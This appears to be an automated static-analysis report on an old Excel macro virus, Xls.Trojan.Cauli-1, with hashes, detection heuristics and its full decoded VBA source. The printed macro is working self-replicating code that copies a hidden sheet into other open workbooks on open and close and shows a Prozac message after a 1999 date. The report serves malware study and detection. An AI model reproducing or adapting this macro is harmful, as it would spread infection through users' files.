Xls.Trojan.Cauli-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 7270111d3cfd4bae…

MALICIOUS

Office (OLE)

Size: 25.0 KB
Created: 1998-09-04 16:45:33
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: ea23f88dc4d69cd5620d1c1a67a12738
SHA-1: 773f30619e48498a1086243d9bbd005c38728d23
SHA-256: 7270111d3cfd4bae60da4acb83136c2d3e521f907a0f849d76b84af35452cac2
Risk score: 220

Malware Insights

Xls.Trojan.Cauli-1 · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

ClamAV identifies the file as malicious with the signature Xls.Trojan.Cauli-1. It contains VBA macros, including an Auto_Open subroutine that is designed to infect other workbooks by copying its own sheet into them. The macro also checks the current date against a deadline and may display a message about depression and Prozac, suggesting a social engineering or distraction element.

Heuristics 4

  • ClamAV: Xls.Trojan.Cauli-1 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Trojan.Cauli-1
  • VBA macros detected [medium] (OLE_VBA_MACROS), 2 related findings
    Document contains VBA macro code
  • Auto_Open macro [high] (OLE_VBA_AUTO)
    Auto_Open macro
  • Auto_Close macro [high] (OLE_VBA_AUTOCLOSE)
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1273 bytes
SHA-256: 290ddffd088da786d3116f20dfa364f79c56b6f2e72159032a34bc2f3e6b80c7
Detection
ClamAV: Xls.Trojan.Cauli-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "cauliflower"






Option Private Module

Private Const deadline = 36161 '01/01/1999

Sub Auto_Open()
    On Error GoTo finish
    Application.ScreenUpdating = False
    For Each wb In Workbooks
        If Not wb.Saved Then
            infect = True
            For Each mdl In wb.Modules
                If mdl.Name = "cauliflower" Then
                    infect = False
                    Exit For
                End If
            Next
            If infect Then
' ***           MULTIPLYING SUBROUTINE STARTS HERE
                ThisWorkbook.Sheets("cauliflower").Copy before:=wb.Sheets(1)
                ActiveWindow.SelectedSheets.Visible = False
' ***           MULTIPLYING SUBROUTINE ENDS HERE
            End If
        End If
    Next
    If DateValue(Date) >= deadline Then
'***    THE "FUNNY MESSAGE" SUBROUTINE STARTS HERE
        answer = MsgBox("Are you depressed", vbYesNo, "LILLY RESCUE MISSION")
        If answer = vbYes Then
            MsgBox ("Depression hurts. PROZAC can help.")
        End If
'***    THE "FUNNY MESSAGE" SUBROUTINE ENDS HERE
    End If
finish:
    ThisWorkbook.Activate
    Application.ScreenUpdating = True
End Sub

Sub Auto_Close()
    Auto_Open
End Sub